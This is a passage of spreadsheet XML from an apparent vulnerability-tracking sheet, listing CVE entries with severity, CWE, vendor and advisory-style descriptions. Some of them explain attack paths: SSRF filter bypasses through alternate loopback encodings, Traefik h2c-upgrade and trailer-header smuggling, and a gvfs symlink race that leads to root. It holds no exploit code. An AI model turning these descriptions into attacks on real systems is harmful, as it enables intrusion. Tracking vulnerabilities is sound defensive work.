          <t>HIGH</t>
        </is>
      </c>
      <c r="E3512" s="5" t="inlineStr"/>
      <c r="F3512" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3512" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3512" s="5" t="inlineStr"/>
      <c r="I3512" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3512" s="5" t="inlineStr"/>
      <c r="K3512" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L3512" s="5" t="inlineStr">
        <is>
          <t>`OpenTelemetry.Resources.Host` NuGet package, which provides OpenTelemetry resource detectors for host, is affected by an untrusted search path vulnerability on macOS. Prior to version 1.16.0-beta.2,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This vulnerability only affect macOS hosts - Linux and Windows hosts are unaffected. Version 1.16.0-beta.2 contains a patch. No known workarounds are available.</t>
        </is>
      </c>
      <c r="M3512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81192</t>
        </is>
      </c>
    </row>
    <row r="3513">
      <c r="A3513" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81389</t>
        </is>
      </c>
      <c r="C3513" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3513" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3513" s="5" t="inlineStr"/>
      <c r="F3513" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3513" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3513" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I3513" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3513" s="5" t="inlineStr"/>
      <c r="K3513" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3513" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M3513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81389</t>
        </is>
      </c>
    </row>
    <row r="3514">
      <c r="A3514" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82062</t>
        </is>
      </c>
      <c r="C3514" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3514" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3514" s="5" t="inlineStr"/>
      <c r="F3514" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3514" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3514" s="5" t="inlineStr"/>
      <c r="I3514" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3514" s="5" t="inlineStr"/>
      <c r="K3514" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3514" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an authenticated user with elevated internal privileges to bypass a disabled feature gate in the applyOps command by specifying an internal replication mode value that was not intended to be client-selectable. This bypass enables execution of container operations that are disabled by default in production configurations, allowing direct storage-engine writes to arbitrary internal storage tables. The authorization check for these operations validates only the operation's namespace, not the actual storage target, enabling writes to unrelated internal metadata or other collections' data.</t>
        </is>
      </c>
      <c r="M3514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t>
        </is>
      </c>
    </row>
    <row r="3515">
      <c r="A3515" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82079</t>
        </is>
      </c>
      <c r="C3515" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3515" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3515" s="5" t="inlineStr"/>
      <c r="F3515" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3515" s="5" t="inlineStr"/>
      <c r="H3515" s="5" t="inlineStr"/>
      <c r="I3515" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3515" s="5" t="inlineStr"/>
      <c r="K3515" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L3515" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability in the Nintendo Switch local wireless networking functionality may allow an attacker within wireless range to execute arbitrary code using return-oriented programming (ROP) through crafted network traffic.
This issue affects Nintendo Switch: before 23.0.0.</t>
        </is>
      </c>
      <c r="M3515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82079</t>
        </is>
      </c>
    </row>
    <row r="3516">
      <c r="A3516" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83940</t>
        </is>
      </c>
      <c r="C3516" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3516" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3516" s="5" t="inlineStr"/>
      <c r="F3516" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3516" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H351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516" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3516" s="5" t="inlineStr"/>
      <c r="K3516" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3516" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83940</t>
        </is>
      </c>
    </row>
    <row r="3517">
      <c r="A3517" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83999</t>
        </is>
      </c>
      <c r="C3517" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3517" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3517" s="5" t="inlineStr"/>
      <c r="F3517" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3517" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3517" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I3517" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3517" s="5" t="inlineStr"/>
      <c r="K3517" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3517" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t>
        </is>
      </c>
    </row>
    <row r="3518">
      <c r="A3518" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85360</t>
        </is>
      </c>
      <c r="C3518" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3518" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3518" s="5" t="inlineStr"/>
      <c r="F3518" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3518" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H351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518" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3518" s="5" t="inlineStr"/>
      <c r="K3518" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3518" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85360</t>
        </is>
      </c>
    </row>
    <row r="3519">
      <c r="A3519" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85594</t>
        </is>
      </c>
      <c r="C3519" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3519" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3519" s="5" t="inlineStr"/>
      <c r="F3519" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3519" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H3519" s="5" t="inlineStr"/>
      <c r="I3519" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3519" s="5" t="inlineStr"/>
      <c r="K3519" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3519" s="5" t="inlineStr">
        <is>
          <t>Traefik versions from v3.7.1 fail to enforce crossProviderNamespaces restrictions on the traefik.ingress.kubernetes.io/service.middlewares Service annotation in the Kubernetes Ingress provider. A namespace-limited tenant excluded from the allowlist can attach an operator-owned middleware to its Service, and if that middleware injects backend credentials, recover them at a controlled backend.</t>
        </is>
      </c>
      <c r="M3519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85594</t>
        </is>
      </c>
    </row>
    <row r="3520">
      <c r="A3520" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86135</t>
        </is>
      </c>
      <c r="C3520" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3520" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3520" s="5" t="inlineStr"/>
      <c r="F3520" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3520" s="5" t="inlineStr"/>
      <c r="H3520" s="5" t="inlineStr"/>
      <c r="I3520" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3520" s="5" t="inlineStr"/>
      <c r="K3520" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-400</t>
        </is>
      </c>
      <c r="L3520" s="5" t="inlineStr">
        <is>
          <t>A Cross-Site Request Forgery (CSRF) vulnerability in WatchGuard Dimension's database snapshot creation feature allows a remote attacker to trigger unauthorized snapshot creation by tricking an authenticated administrator into visiting a specially crafted web page.</t>
        </is>
      </c>
      <c r="M3520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86135</t>
        </is>
      </c>
    </row>
    <row r="3521">
      <c r="A3521" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86419</t>
        </is>
      </c>
      <c r="C3521" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3521" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3521" s="5" t="inlineStr"/>
      <c r="F3521" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3521" s="5" t="inlineStr"/>
      <c r="H3521" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I3521" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3521" s="5" t="inlineStr"/>
      <c r="K3521" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-918</t>
        </is>
      </c>
      <c r="L3521" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP contain insufficient validation of server-side outbound HTTP destinations in feed retrieval and TAXII discovery functionality.
In feed processing, redirects were followed without validating the redirect scheme or destination. The original request headers were reused across redirect hops, meaning authentication headers or API credentials configured for a feed could be forwarded to a different host. Redirects could also target internal network resources, resulting in SSRF. The fix adds redirect validation, blocks internal destinations for cross-host redirects, strips configured feed credentials before following redirects to another host, and pins validated DNS results to prevent re-resolution after validation.
The TAXII discovery endpoint had a related incomplete SSRF defense. It used gethostbyname() and compared the result against only a few literal addresses. This missed cases including IPv6 loopback (::1), numeric host encodings such as 0x7f000001, and potentially multiple DNS records. The fix moves TAXII discovery to the shared URL egress validator.
Together, these commits harden MISP's outbound URL handling against alternate-address representations, DNS-related bypasses, unsafe redirects, internal-host access, and cross-host credential forwarding.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M3521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86419</t>
        </is>
      </c>
    </row>
    <row r="3522">
      <c r="A3522" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86749</t>
        </is>
      </c>
      <c r="C3522" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3522" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3522" s="5" t="inlineStr"/>
      <c r="F3522" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3522" s="5" t="inlineStr"/>
      <c r="H3522" s="5" t="inlineStr"/>
      <c r="I3522" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3522" s="5" t="inlineStr"/>
      <c r="K3522" s="5" t="inlineStr">
        <is>
          <t>CWE-252</t>
        </is>
      </c>
      <c r="L3522" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions &lt;= 8.6.3 (fixed in 8.7.0) do not check the return value of storage write operations in ImageUploadRequest::handleImages(). Because Laravel's default disk mode does not throw on failure, a silently failed Storage::disk('public')-&gt;put(...) call still caused the application to delete the previous image via deleteExistingImage() and to reassign and persist the model's image reference to the new filename, destroying the existing image and leaving the database row pointing at a file that was never written. A mirror problem existed in deleteExistingImage(), where a failed Storage::delete() still nulled the model's image field, orphaning the file on disk. The condition is not directly attacker-controlled: it is triggered when any legitimate authenticated user submits an image upload while the storage backend transiently fails (for example an S3 network error, a local filesystem permission problem, or quota exhaustion). The result is unrecoverable loss of the prior image and a durable inconsistency between the database and disk that requires manual reconciliation. All models whose controllers route through ImageUploadRequest::handleImages (assets, asset models, users, companies, manufacturers, locations, categories, suppliers, departments, and other image-carrying models) are affected.</t>
        </is>
      </c>
      <c r="M3522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86749</t>
        </is>
      </c>
    </row>
    <row r="3523">
      <c r="A3523" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87088</t>
        </is>
      </c>
      <c r="C3523" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3523" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3523" s="5" t="inlineStr"/>
      <c r="F3523" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3523" s="5" t="inlineStr"/>
      <c r="H3523" s="5" t="inlineStr"/>
      <c r="I3523" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3523" s="5" t="inlineStr"/>
      <c r="K3523" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3523" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an unauthorized code execution vulnerability in Enforce.</t>
        </is>
      </c>
      <c r="M3523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87088</t>
        </is>
      </c>
    </row>
    <row r="3524">
      <c r="A3524" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87825</t>
        </is>
      </c>
      <c r="C3524" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3524" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3524" s="5" t="inlineStr"/>
      <c r="F3524" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3524" s="5" t="inlineStr"/>
      <c r="H3524" s="5" t="inlineStr"/>
      <c r="I3524" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3524" s="5" t="inlineStr"/>
      <c r="K3524" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3524" s="5" t="inlineStr">
        <is>
          <t>zstd-jni before 1.5.7-14 contains a use-after-free vulnerability where streams and contexts hold a dictionary's shared lock only during the load call, allowing the dictionary to be closed while still referenced. Attackers can close a dictionary after associating it with a stream or context, causing subsequent read or write operations to access freed native memory, resulting in silent data corruption or JVM crashes.</t>
        </is>
      </c>
      <c r="M3524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87825</t>
        </is>
      </c>
    </row>
    <row r="3525">
      <c r="A3525" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87877</t>
        </is>
      </c>
      <c r="C3525" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3525" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3525" s="5" t="inlineStr"/>
      <c r="F3525" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3525" s="5" t="inlineStr"/>
      <c r="H3525" s="5" t="inlineStr"/>
      <c r="I3525" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3525" s="5" t="inlineStr"/>
      <c r="K3525" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3525" s="5" t="inlineStr">
        <is>
          <t>zstd-jni versions before 1.5.7-14 fail to validate closed state in setDict, setLongMax, setLevel and setRefMultipleDDicts methods of stream classes. Attackers can call these methods on closed streams to write through freed native pointers, corrupting unrelated objects or crashing the JVM.</t>
        </is>
      </c>
      <c r="M3525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87877</t>
        </is>
      </c>
    </row>
    <row r="3526">
      <c r="A3526" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88004</t>
        </is>
      </c>
      <c r="C3526" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3526" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3526" s="5" t="inlineStr"/>
      <c r="F3526" s="5" t="inlineStr"/>
      <c r="G3526" s="5" t="inlineStr"/>
      <c r="H3526" s="5" t="inlineStr"/>
      <c r="I3526" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3526" s="5" t="inlineStr"/>
      <c r="K3526" s="5" t="inlineStr">
        <is>
          <t>CWE-436, CWE-807</t>
        </is>
      </c>
      <c r="L3526" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open source HTTP reverse proxy and load balancer. From 3.2.0 until 3.7.13, Traefik entrypoint defenses aliasHeadersStrategy, underscoreHeadersStrategy, and forwardedHeaders inspect req.Header but not req.Trailer, allowing an unauthenticated client to submit an aliasing or trusted header name in an HTTP/1.1 chunked trailer or an HTTP/2 trailer. When the retry or buffering middleware reads the body before the reverse proxy clones the request, the attacker-controlled trailer value reaches a backend that merges trailers into the header namespace, bypassing the documented delete or reject behavior and potentially spoofing identity or forwarded routing data. This issue is fixed in 3.7.13.</t>
        </is>
      </c>
      <c r="M3526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88004</t>
        </is>
      </c>
    </row>
    <row r="3527">
      <c r="A3527" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88008</t>
        </is>
      </c>
      <c r="C3527" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3527" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3527" s="5" t="inlineStr"/>
      <c r="F3527" s="5" t="inlineStr"/>
      <c r="G3527" s="5" t="inlineStr"/>
      <c r="H3527" s="5" t="inlineStr"/>
      <c r="I3527" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3527" s="5" t="inlineStr"/>
      <c r="K3527" s="5" t="inlineStr">
        <is>
          <t>CWE-444, CWE-863</t>
        </is>
      </c>
      <c r="L3527" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open source HTTP reverse proxy and load balancer. From 2.11.26 until 2.11.57 and 3.7.13, Traefik forwards a client-supplied Connection header requesting Upgrade, the Upgrade: h2c token, and HTTP2-Settings to a shared backend. If the backend accepts h2c and returns 101 Switching Protocols, Traefik enters a raw tunnel and no longer applies routers, BasicAuth, ForwardAuth, IPAllowList, RateLimit, access logging, metrics, or tracing to later HTTP/2 requests, allowing an unauthenticated request through an unprotected route to reach protected paths on the same backend. This issue is fixed in 2.11.57 and 3.7.13.</t>
        </is>
      </c>
      <c r="M3527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88008</t>
        </is>
      </c>
    </row>
    <row r="3528">
      <c r="A3528" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88924</t>
        </is>
      </c>
      <c r="C3528" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3528" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3528" s="5" t="inlineStr"/>
      <c r="F3528" s="5" t="inlineStr"/>
      <c r="G3528" s="5" t="inlineStr"/>
      <c r="H3528" s="5" t="inlineStr"/>
      <c r="I3528" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3528" s="5" t="inlineStr"/>
      <c r="K3528" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L3528" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the admin backend of gvfs. The privileged gvfsd-admin daemon changes the ownership of newly created private D-Bus sockets by calling the link-following chown() function on a pathname inside a user-controlled directory. A local attacker can exploit this via a Time-of-Check Time-of-Use (TOCTOU) race condition and exchange the socket pathname with a symbolic link pointing to an arbitrary root-owned file (such as /etc/pam.d/su). The daemon subsequently follows the symlink and changes the ownership of the targeted root-owned file to the attacker's user ID. This allows an authenticated local attacker to modify critical system files, leading to a full local privilege escalation to root.</t>
        </is>
      </c>
      <c r="M3528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88924</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:M3528"/>
  <conditionalFormatting sqref="D2:D352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3528">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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1570" r:id="rId1569"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1571" r:id="rId1570"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1572" r:id="rId1571"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1573" r:id="rId1572"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1574" r:id="rId1573"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1575" r:id="rId1574"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1576" r:id="rId1575"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1577" r:id="rId1576"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1578" r:id="rId1577"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1579" r:id="rId1578"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1580" r:id="rId1579"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1581" r:id="rId1580"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1582" r:id="rId1581"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1583" r:id="rId1582"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1584" r:id="rId1583"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1585" r:id="rId1584"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1586" r:id="rId1585"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1587" r:id="rId1586"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1588" r:id="rId1587"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1589" r:id="rId1588"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1590" r:id="rId1589"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1591" r:id="rId1590"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1592" r:id="rId1591"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1593" r:id="rId1592"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1594" r:id="rId1593"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1595" r:id="rId1594"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1596" r:id="rId1595"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1597" r:id="rId1596"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1598" r:id="rId1597"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1599" r:id="rId1598"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1600" r:id="rId1599"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1601" r:id="rId1600"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1602" r:id="rId1601"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1603" r:id="rId1602"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1604" r:id="rId1603"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1605" r:id="rId1604"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1606" r:id="rId1605"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1607" r:id="rId1606"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1608" r:id="rId1607"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1609" r:id="rId1608"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1610" r:id="rId1609"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1611" r:id="rId1610"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1612" r:id="rId1611"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1613" r:id="rId1612"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="M1614" r:id="rId1613"/>
